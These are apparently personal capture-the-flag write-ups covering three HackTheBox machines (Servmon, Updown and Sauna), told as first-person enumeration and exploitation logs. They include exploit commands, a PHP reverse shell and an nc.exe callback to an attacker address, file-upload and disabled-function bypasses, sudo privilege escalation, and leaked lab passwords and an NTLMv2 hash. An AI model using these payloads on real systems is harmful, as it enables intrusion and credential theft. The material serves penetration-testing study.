123/udp open|filtered ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr

OSINT & port 80

Briefly - Servmon is a service that monitors websites, servers, and sends alerts depending on how it’s setup. NVMS 1000 is a tool from Voltex Security Systems, from what I see them make like surveillance cameras and other tools.

The website looks like a monitoring dashboard for those surveillance tooling. Basic default credentials do not work. I ran ffuf to look for subdomains and other directories.

ffuf -u 'http://10.129.227.77/Pages/FUZZ.htm' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt and ffuf -u 'http://10.129.227.77/' -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H 'Host: FUZZ.10.129.227.77' -fs 340 should do an alright basic enumerator, however I feel like I need to enumerate directories better.

I found no other subdomains and some directories:

login [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 44ms]
main [Status: 200, Size: 6126, Words: 1256, Lines: 142, Duration: 73ms]
Login [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 40ms]
Main [Status: 200, Size: 6126, Words: 1256, Lines: 142, Duration: 74ms]
changePassword [Status: 200, Size: 938, Words: 49, Lines: 43, Duration: 46ms]
MAIN [Status: 200, Size: 6126, Words: 1256, Lines: 142, Duration: 48ms]
changepassword [Status: 200, Size: 938, Words: 49, Lines: 43, Duration: 74ms]
ChangePassword [Status: 200, Size: 938, Words: 49, Lines: 43, Duration: 79ms]
LogIn [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 41ms]
%3FRID%3D2671 [Status: 200, Size: 118, Words: 3, Lines: 5, Duration: 38ms]
LOGIN [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 36ms]
login%3f [Status: 200, Size: 118, Words: 3, Lines: 5, Duration: 82ms]

When I accessed that website I was automatically moved to http://10.129.227.77/Pages/login.htm which both takes me into “Pages” and assumes a “.htm” extension which isn’t something I see often. I can also google around and see what webserver behaves like that as Wappalyzer only find JQuery.

I will enumerate other possible extensions with and look for other folders besides “Pages” with ffuf in a second, as there are a lot of other ports and I think I can find some low-hanging fruit before a full enumeration.

There is an anonymous FTP access. Inside I found a folder “Users” containing two users - Nadine and Nathan.

In Nathans file I found a “Confidential.txt” file containing this message from Nadine:

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine%

And as for Nadine, there was a to-do file containing:

1) Change the password for NVMS - Complete
2) Upload the passwords
3) Remove public access to NVMS
4) Place the secret files in SharePoint% 

In this context “NVMS” likely means a network video management system which is a program used to manage CCTV/IP cameras.

NSClient likely refers to NSClient++, a Windows agent used with Nagios for monitoring.

Nagios is a monitoring tool used to track servers, services, and network devices. Nagios is very similar to servmon so I wonder if I will see both tools or maybe some hybrid. Also, I wonder if there will be some CCTV footage - let’s dig and find out.

SMB null session is disabled, I tried basic creds for the known users and didn’t manage to get in.

On port 8443 there is NSClient++ dashboard opened when access with HTTPS. When I accessed it I got a white page implying that I can’t see its content without some authentication. After I refreshed it a couple of times I got a login screen which I didn’t see before.

I found this info about passwords.

The NSClient++ password can be found by running:
nscp web -- password --display

or you can sett a new password:
nscp web -- password --set new-password

Looking at the information i gathered I should likely aim for Nathans Desktop, but I’m not sure how can I get there right now. Maybe with SMB if his desktop is the share, but without BFing and a bit of luck this doesn’t seem plausible.

I can’t brute rid with smb, likely the guest account is disabled.

I ran hydra 10.129.28.144 -s 8443 -S -L users -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt http-get "/auth/token?password=^PASS^:F=403 Your not allowed" on the HTTPS port just so I have some scans running in the background.

The other directories I found don’t give much assistance, but some of them seem unfinished or not working correctly.

I also started to BF extensions with ffuf -u http://10.129.28.144/Pages/loginFUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions-big.txt and look for other directories than “Pages” with ffuf -u 'http://10.129.28.144/FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 118.

Hydra didn’t find any common passwords.

Other root directories:

%3FRID%3D2671 [Status: 200, Size: 340, Words: 32, Lines: 13, Duration: 51ms]

Weird thing about this directory is that when I use it, it constantly refreshes and copies it’s subdirectory in the url in each iteration. Decoded means “?RID=2671” which is interesting.

I didn’t find any other extensions.

I just notices that there is LLMNR running on the host and no DNS. I will keep responder running in the background.

I tested basic SSTI and SQL injections on the authentications. One thing to check would be sqlmap but I don’t feel like this is the right way.

Foothold

Searchsploit found some public exploits for nvms-1000

NVMS 1000 - Directory Traversal | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal | hardware/webapps/48311.py

Yup, I found a nifty exploit on github for unwanted directory traversal. I read how it works, run it and found some creds!

azaeir@parrot (~/Desktop/htb/machines/servmon/NVMS1000-Exploit): python3 nvms.py 10.129.28.144 /Users/Nathan/Desktop/Passwords.txt
[+] DT Attack Succeeded
[+] File Content

++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++

I user users.txt file which holds both users - lower, and upper case versions - and run it through netexec against a list of passwords. There are two hits for nadine, against SMB and SSH with L1k3B1gBut7s@W0rk.

Nadine has read access to IPC$ but sadly I can’t view any content. I did manage to run a rid bruteforce - here are the results:

SMB 10.129.28.144 445 SERVMON 500: SERVMON\Administrator (SidTypeUser)
SMB 10.129.28.144 445 SERVMON 501: SERVMON\Guest (SidTypeUser)
SMB 10.129.28.144 445 SERVMON 503: SERVMON\DefaultAccount (SidTypeUser)
SMB 10.129.28.144 445 SERVMON 504: SERVMON\WDAGUtilityAccount (SidTypeUser)
SMB 10.129.28.144 445 SERVMON 513: SERVMON\None (SidTypeGroup)
SMB 10.129.28.144 445 SERVMON 1000: SERVMON\Nathan (SidTypeUser)
SMB 10.129.28.144 445 SERVMON 1001: SERVMON\Nadine (SidTypeUser)

There are no interesting, custom, unknown users. I counted that maybe there will be a user with RID 2671 but sadly that’s not the case.

SSH access worked and I found a user flag on Nadine’s Desktop.

In the root of the filesystem there is a RecData which holds what looks like to be SQLite database files:

RecordInfoDB.db3
RecordInfoDB.db3-journal

I downloaded them with scp and enumerated with sqlite3 but they are empty. From the schema and general context it looks like a database which would hold surveillance videos or data.

Looking further, in program files I found folders for both NSClient++ and NVMS1000. I looked through them and noted more interesting files, found some certificates with private keys as well/

C:\Program Files\NSClient++\security
C:\Program Files\NSClient++\scripts\custom

I noted that down and searched for any simpler priv-esc possibilities.

I decided to run WinPEAS and look what it finds.

+----------¦ Enumerating NTLM Settings
 LanmanCompatibilityLevel : (Send NTLMv2 response only - Win7+ default)
 NTLM Signing Settings
 ClientRequireSigning : False
 ClientNegotiateSigning : True
 ServerRequireSigning : False
 ServerNegotiateSigning : False
 LdapSigning : Negotiate signing (Negotiate signing)
---
+----------¦ Enumerating Named Pipes 
 Name CurrentUserPerms Sddl
 eventlog Everyone [Allow: WriteData/CreateFiles] O:LSG:LSD:P(A;;0x1201
9b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
 vgauth-service Everyone [Allow: WriteData/CreateFiles] O:BAG:SYD:P(A;;0x1201
9f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
---
Folder: C:\Users\Nadine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
 FolderPerms: Nadine [Allow: AllAccess]
 File: C:\Users\Nadine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\Nadine\AppData\Roaming\M
icrosoft\Windows,C:\Users\Nadine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
 FilePerms: Nadine [Allow: AllAccess]
 Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
---
+----------¦ Enumerating Security Packages Credentials
 Version: NetNTLMv2 
 Hash: Nadine::SERVMON:1122334455667788:847f1545e73196bfcc29b0eccb1a34dc:0101000000000000b7fb082aaacddc01e27df20ae5988a5d000000000800300030000000000000000000000000200000123997709cfe96c3cf5a71ae9cae03f41156e02642aed9e3642bae814b91bb1d0a00100000000000000000000000000000000000090000000000000000000000

This is a summery of the most interesting finds:

Judging by the NTLM settings, there is a possibility of a relay attack
It found some named pipes, but nothing that screams direct priv-esc really
There is a chance for persistence with the rights to the startup folder which is nice
WinPEAS also found an NTLMv2 hash in packages credentials (in memory)

Let’s try to crack that NTLMv2 hash - hashcat -m 5600 nadine.hash /usr/share/wordlists/SecLists/Passwords/Common-Credentials/xato-net-10-million-passwords.txt Sadly, I didn’t manage crack it.

Privilege Escalation

Learning from the foothold, I looked for any public exploits for both NVMS1000 and NSClient++ - seems like I found one for the latter.

I need to verify the version to make sure.

nadine@SERVMON C:\Program Files\NSClient++>.\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

Yes, there is an exploit. Here’s a summery from the script itself:

# NSClient++ is a monitoring agent that has the option to run external scripts.
# This feature can allow an attacker, given they have credentials, the ability to execute
# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt
# Default, this leads to privileged code execution.

I roughly followed the instruction from git, here is what I did.

Get the web administrator password nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini and it shows a password in the config - Web Admin password: ew2x6SsGTxjRwXOT
Download the exploit from here
Created a temp file in the root directory with mkdir temp and uploaded nc.exe with scp ~/Desktop/tools/nc.exe nadine@10.129.227.77:C:/temp/
Did local port forwarding with ssh -L 8443:127.0.0.1:8443 nadine@10.129.227.77
Lunched a listener on the attack host with nc -lnvp 1337
Renamed the script from “48360.txt.txt” to “48360.py” with the mv command
Run the script with this command python3 48360.py -t 127.0.0.1 -P 8443 -p "ew2x6SsGTxjRwXOT" -c "C:\temp\nc.exe 10.10.15.189 1337 -e cmd.exe"

With these steps I managed to get a callback on my listener as NT SYSTEM and I found a root flag on admin’s desktop.

I also created an issue for the author of this exploit to make the official instruction simpler to follow along.

Closing Thoughts

Servmon is a relatively simple machine. There are two public exploits that can be used to finish it and a Metasploit script for even less hustle. The level of complexity highly depends on your approach. Overall a good machine to try out.

Regarding lessons learned, I again spent too much time looking for a ton of different possible ways to pivot and didn’t focus on the most obvious one. Detailed enumeration is very important but I should see until the end each vector before moving to another just for the time sake.

Updown

EmilPawlak@protonmail.com (Emil Pawlak) — 12.04.2026

Enumeration

nmap

I start with a nmap scan which shows that the only ports opened are HTTP, SSH on TCP and DHCP on UDP.

nmap scan results

Nmap scan report for 10.129.227.227
Host is up (0.040s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
| 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/9%OT=22%CT=1%CU=34949%PV=Y%DS=2%DC=I%G=Y%TM=69D81DCE
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(
OS:SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=F4%GCD=1%ISR=F8%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=F8%GCD=1
OS:%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M4E2ST11NW7%O2=M4E2ST11NW7%O3=M4E2NN
OS:T11NW7%O4=M4E2ST11NW7%O5=M4E2ST11NW7%O6=M4E2ST11)WIN(W1=FE88%W2=FE88%W3=
OS:FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M4E2NNSNW7%CC=Y%
OS:Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IP
OS:L=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.58 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 23:44 CEST
Nmap scan report for 10.129.227.227
Host is up (0.028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 11.93 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 23:45 CEST
Nmap scan report for 10.129.227.227
Host is up (0.028s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc

Nmap done: 1 IP address (1 host up) scanned in 1011.77 seconds

HTTP

Looking at the website we can see that it’s conceptually a simple website that checks if another given website is up, or down. Looking around the mechanism normally and through burpsuite I can see that there is a lot of filtering around the input. The most bare down version of a query is “h://t” but any type of injection or inclusion are being caught by the system’s logic.

Now I’ll set up a listener and see if the checker connects - it does. I now created a PHP shell and I’ll see if it executes it. Unfortunately it doesn’t.

I scanned for different subdomains and directories with [[ffuf]] and I found “dev” for both of the scans. It however only shows a 403 - forbidden error.

I started another directory enumeration with ffuf - this time inside /dev and it came I found a “.git” directory. I didn’t think of it as valuable at first, but after some digging and reading it can hold some nice data. I also found this tool named git-dumper which seems it could be useful exactly for that.

Git code review

I tested both manual enumeration and with git-dumper. The second one is in my opinion superior as the tool doesn’t only download and list files from /.git as I expected - it reconstructs the repo itself rebuilding the actual working directory from the git objects.

From the “changelog.txt” I learn that there is an upload option on the website and a plan for a new admin panel. Checking the “checker.php” I found some interesting information about the logic of the website, especially these parts:

# Check if extension is allowed.
	$ext = getExtension($file);
	if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
		die("Extension not allowed!");
	}

# Create directory to upload our file.
	$dir = "uploads/".md5(time())."/";
	if(!is_dir($dir)){
 mkdir($dir, 0770, true);
 }
 
# File size must be less than 10kb.
	if ($_FILES['file']['size'] > 10000) {
 die("File too large!");
 }

Key information:

I know which extensions are not allowed
I know the upload location and the naming convention of the uploaded file too
I know that the file must be smaller than 10 kB.

Now my task is to structure an attack path that will check all of these boxes. Firstly, one php related extension which can execute that I don’t see mentioned in the script is “.phar”. With a reverse shell named “shell.phar” I would need to access it under “http://siteisup.htb/uploads//shell.phar” - let’s see if I’m right.

I create a shell file, the payload itself is from PentestMonkey. I started a python server where my shell resides with azaeir@parrot (~/Desktop/htb/machines/updown): python -m http.server 1338, I requested the shell from the siteisup.htb and got a confirmation that it was successful. This confirmation also contains a timestamp 10.129.227.227 - - [11/Apr/2026 16:51:45] "GET /shell.phar HTTP/1.1" 200 -. I quickly read that the PHP’s time() function uses epoch format. I could’ve ran the function myself, but I found a simple website that converts time dates into epoch. I take my output of “1765462305” and run it against a hash generator and get my hash - here is the process:

11/Apr/2026 16:51:45 - Original
11/Apr/2026 14:51:45 - Converted to UTC
1775919105 - Converted into Epoch
696c4310b51bd75fc8591dca1f24e191 - Hashed with MD5

Sadly - even though it would be a cool technique - this doesn’t work. This could be because of the server using different time or the last function in the script which might automatically delete uploaded files to block this whole attack path.

I decided to step back and carefully read through all the files and try to understand them.

Foothold

Setting up the header

In the .htaccess there is a rule that blocks all traffic unless a request includes the “Special-Dev header set to “only4dev”, which then grants access via an environment flag. Let’s try to access both the normal and the dev. subdomain.

I can’t seem to make it work with burpsuite, I get a time-out, but curl does work curl -H "Special-Dev: only4dev" http://dev.siteisup.htb. To make it work better I found this firefox add-on which made it persistent.

PHP wrappers

At this point I struggled a lot. I got access to the developer which allowed me this time to upload a file with URL addresses to check if they are up or down. I wasn’t able to upload any rev shells or webshell because of the extension limits I saw in the source code. When I accessed the admin page I noticed a “page” get parameter so I decided to look for some PHP filters and attempt LFI but this also failed. While researching PHP filters I stumbled upon the topic of PHP wrappers. In short, PHP wrappers allow PHP to read a bunch of different streams of data. So besides being used with http:// or https:// it can also understand zip://, phar:// and a bunch of more of them. As I wasn’t able to input basic php extensions I wanted to upload a zip file with my rev shell but it didn’t work. I guess partially because of the fact that php was also somewhere in the code mentioned to be black listed, and, also because they might be further filtering for PHP functions rendering most of the shell useless. I decided to create a zip file but change it’s extension to something random, hoping that filtering doesn’t check the magic bytes and run <?php phpinfo(); ?>. To access this file, I decided to try phar as it behaves in a lot of ways like zip data stream but it might’ve not been blocked and to my surprise, this combination worked. http://dev.siteisup.htb/?page=phar://uploads/4eba46216cd35f13b3cd75de77575283/info.az/info.

In phpinfo I can see a big list of disabled function which explains why my shells didn’t work.

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,error_log,system,exec,shell_exec,popen,passthru,link,symlink,syslog,ld,mail,stream_socket_sendto,dl,stream_socket_client,fsockopen

Bypassing filters

I could look through them manually and see if there are any that were not mentioned, but I much more prefer to use dfunc-bypasser. The original dfunc runs on python2 which is deprecated, but I luckily found a python3 fork. When I ran this script it didn’t want to connect to the site, this is likely because of the fact that we need a special header to access it. I made a copy of the tool and looked through it to see if I can add edit the header somewhere in it but I wasn’t able to figure it out. I just decided to cut my losses and examine the list myself. It would be a big waste of time if I started to edit a python script for it to not find any functions.

I wanted to go one-by-one through the functions. Then I thought I could make some short python script/loop that would check phpinfo() output and mark those vulnerable functions and lastly I though “this functionality must be in the dfunc-bypasser itself, right?” Because of that I noticed two easy way to enumerate those functions.

Firstly there is no need to edit the dfunc-bypasser, there is a simple -H flag which worked for me dfunc-bypasser.py --url 'http://dev.siteisup.htb/?page=phar://uploads/9d7e3ad5bd39603e06555b7ab37a490d/info.az/info' -H 'Special-Dev=only4dev'.

Secondly, there is a --file flag which takes a local file of phpinfo so one could dump the data from the website and parse it that way.

Setting up a shell

Finally, I can see that proc_open is a function that is not being filtered.

To exploit this function I started to look for different web shells like this one or this one. I swapped through a bunch of them until I finally found one that worked and didn’t use any forbidden functions:

<?php
$descriptorspec = array(
 0 => array("pipe", "r"), // stdin
 1 => array("pipe", "w"), // stdout
 2 => array("pipe", "w") // stderr
);

$process = proc_open('/bin/bash -c "bash -i >& /dev/tcp/10.10.15.189/1337 0>&1"', $descriptorspec, $pipes);

if (is_resource($process)) {
 fclose($pipes[0]);
 fclose($pipes[1]);
 fclose($pipes[2]);
 proc_close($process);
}
?>

I put it in “procopenshell.php” and zipped it using an arbitrary extension - zip proc.lol procopenshell.php. I started a listener to catch the shell - rlwrap -r nc -lnvp 1337 And soon after I uploaded the file, I access the shell with this URL http://dev.siteisup.htb/?page=phar://uploads/b47622cacd7fde0edbbdcea9c74b7e28/proc.lol/procopenshell

What I found confusing is that I had to specify an extension for procopenshell.php even though the websites logic showed that it will append it itself. Without the extension, shell doesn’t execute. Maybe it’s because the file is in an archive? I guess it just checks the initial archive folder and doesn’t look inside - hard for me to tell.

www-data

Anyway, with this we finally get a shell as a www-data user.

www-data@updown:/home/developer/dev$ ls -la
ls -la
total 32
drwxr-x--- 2 developer www-data 4096 Jun 22 2022 .
drwxr-xr-x 6 developer developer 4096 Aug 30 2022 ..
-rwsr-x--- 1 developer www-data 16928 Jun 22 2022 siteisup

Looking around the machine, I see that there is a user.txt flag located in the developer home directory. I can’t access it, because I lack permissions to read it. In the home directory of that user there is a /dev folder which hosts two files - “siteisup” and “siteisup_text.py”.

Looking at the files I can see that siteisup has a sid as root so this is likely a way to priv-esc.

Looking at siteisup with the strings command I can see that it is related to siteisup_text.py.

Welcome to 'siteisup.htb' application
/usr/bin/python /home/developer/dev/siteisup_test.py

Next step is to read and understand the second script.

import requests

url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
	print "Website is up"
else:
	print "Website is down"

I missed this detail few first times I read the code, but apparently this is a Python2 code and it uses the input() function to get user input which luckily for me also automatically executes code. This function uses eval() in the backend meaning it behaves like eval in all other languages!

First i tried a code injection with __import__('os').system('bash') into siteisup_test.py but it hangs the shell up.
Then, I tried a code injection with __import__('os').system('bash') into siteisup which worked without any issues.

developer

With that, I got a partial access as the developer account. The word partial is important - in reality - I only siteisup tool as the developer, other than that my permissions are still www-data level.

-rw-r----- 1 root developer 33 Apr 12 10:06 user.txt
cat user.txt
cat: user.txt: Permission denied

Luckily, quickly looking around the developer’s home directory I found their id_rsa private key. Which I copied, changed permissions and ran which game me full permissions as that account.

Privilege Escalation

I started my further enumeration with checking if I have any sudo access, turns out that I do.

developer@updown:~$ sudo -l
Matching Defaults entries for developer on localhost:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User developer may run the following commands on localhost:
 (ALL) NOPASSWD: /usr/local/bin/easy_install

I never heard of easy_install, but I googled it and it actually is in GTFOBins.

I simply had to create a fake setup.py holding my bash payload inside, setup a listener on my attacker host, and run the script with sudo.

developer@updown:~$ echo 'import os; os.system("exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty")' >setup.py
developer@updown:~$ cat setup.py
import os; os.system("exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty")
developer@updown:~$ sudo easy_install .

And boom, there is root.

Closing Thoughts

Updown is a really challenging machine very focused on niche web exploitation, solid code review and careful parameter manipulation to actually exploit the attack vectors.

It would be tough not to admit that I struggled at almost every point of this box. I learned a lot of new attack paths and I had to level up my game around code review, web attacks as well as injections and bypasses.

Sauna

EmilPawlak@protonmail.com (Emil Pawlak) — 09.04.2026

Enumeration

nmap

As usual, I start with running a nmap scan with sudo nmap -sC -sV -Pn -O 10.129.95.180; sleep 5; sudo nmap -p- -Pn 10.129.95.180; sleep 5; sudo nmap -sU -Pn 10.129.95.180.

nmap scan results

Nmap scan report for 10.129.95.180
Host is up (0.029s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-08 23:27:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
| date: 2026-04-08T23:27:10
|_ start_date: N/A
| smb2-security-mode: 
| 3:1:1: 
|_ Message signing enabled and required
|_clock-skew: -1h00m01s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.38 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 02:27 CEST
Nmap scan report for 10.129.95.180
Host is up (0.029s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49676/tcp open unknown
49688/tcp open unknown
49696/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 104.50 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-09 02:29 CEST
Nmap scan report for 10.129.95.180
Host is up (0.030s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap

Results show general Windows Active Directory open ports. For an initial enumeration the most interesting ports are DNS, HTTP and SMB. If I won’t find an attack vector there I would go and enumerate LDAP, RPC and later ADWS.

Additionally from the nmap scan I learn that the domain name is “EGOTISTICAL-BANK.LOCAL” which I added to my /etc/hosts file.

I started with SMB anonymous access bit it didn’t work. I also don’t know the DC name so I will postpone my DNS enumeration for now.

Website

I enumerated the website. Besides the funny theme of it, I found three different forms - newsletter, comment section and a contact form. I tried to provide basic, expected data into them and they all errored out with a 405 page.

405 - HTTP verb used to access this page is not allowed.
The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.

This is a strange behavior. A http verbs like “POST”, “GET”, “PUT”, “DELETE” etc. Do test this behavior out I ran BurpSuite and checked which verbs worked. From my testing the POST request format as a whole is not working and when changed to GET the response code turns to 200.

Due to the POST body turning into a GET parameter, I tried to inject the parameters with SSTI strings, XSS code and finally SQL injections manually but I didn’t create any unexpected behavior. I then saved BurpSuite requests to those 3 forms and forwarded them into sqlmap to further check for vulnerabilities there.

In the meantime I ran a directory and subdomain enumerations with ffuf. This ffuf -u http://EGOTISTICAL-BANK.LOCAL/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt directory enumeration command returned:

css [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 28ms]
fonts [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 30ms]
IMAGES [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 30ms]
Fonts [Status: 301, Size: 159, Words: 9, Lines: 2, Duration: 27ms]
CSS [Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 31ms]

So no interesting directories have been found at the first glance.

ffuf -u http://EGOTISTICAL-BANK.LOCAL/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.EGOTISTICAL-BANK.LOCAL" -fs 32797 Showed no new subdomains so the DC hostname is still unknown.

RID bruteforcing

I tried to enumerate other host users with a netexec rid-brute, but it didn’t work. Guest account is either disabled or was denied.

DNS

For the next step I ran the dig command to enumerate some basic information about the domain itself. In a SOA record I found what is most likely the DC name. EGOTISTICAL-BANK.LOCAL. 3600 IN SOA sauna.EGOTISTICAL-BANK.LOCAL. hostmaster.EGOTISTICAL-BANK.LOCAL. 50 900 600 86400 3600 Besides that, I didn’t find any other useful data there.

LDAP

I checked LDAP with ldapsearch and it worked with an anonymous access ldapsearch -x -H ldap://10.129.95.180/ -b "DC=EGOTISTICAL-BANK,DC=LOCAL". This resulted in some interesting information:

Info:
ms-DS-MachineAccountQuota: 10
msDS-Behavior-Version: 7
msDS-PerUserTrustQuota: 1
msDS-AllUsersTrustQuota: 1000
msDS-PerUserTrustTombstonesQuota: 10

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

minPwdLength: 7
lockoutThreshold: 0

Key facts:

Each user can create 10 machine account
Passwords can have minimum of 7 characters
There are no lockouts
There is a user “Hugo Smith” on the box

Foothold

fsmith

Looking at the website I found this user mentioned around other people. Seeing as I have basic information about the password policy and I know some users I could consider a bruteforce attack if I won’t find any other valid vector.

Interestingly, on the website there is “Hugo Bear” and “Fergus Smith” but in the LDAP search I found “Hugo Smith”.

